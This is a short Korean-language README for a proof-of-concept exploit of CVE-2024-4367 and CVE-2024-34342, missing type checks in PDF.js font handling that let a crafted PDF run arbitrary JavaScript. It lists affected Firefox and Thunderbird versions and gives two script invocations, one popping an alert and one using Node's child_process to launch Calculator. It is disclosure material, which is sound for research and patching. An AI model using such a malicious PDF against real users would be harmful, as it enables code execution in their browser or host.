
CVE-2024-4367 & CVE-2024-34342 개념 증명
PDF.js에서 폰트를 처리할 때 타입 검사가 누락되어, PDF.js 컨텍스트 내에서 임의 JavaScript 실행이 가능했습니다. 이 취약점은 Firefox < 126, Firefox ESR < 115.11, Thunderbird < 115.11에 영향을 미칩니다.
pdf.js가 악성 PDF를 로드하는 데 사용되고, PDF.js가 isEvalSupported를 true로 설정한 경우(기본값), 제한 없이 공격자가 제어하는 JavaScript가 호스팅 도메인의 컨텍스트에서 실행됩니다.
python3 CVE-2024-4367.py "alert(document.domain)"

python3 CVE-2024-4367.py "require('child_process').exec('open -a /Applications/Calculator.app');"

이것은 제가 발견한 버그가 아니며, 단지 PoC를 제작한 것입니다.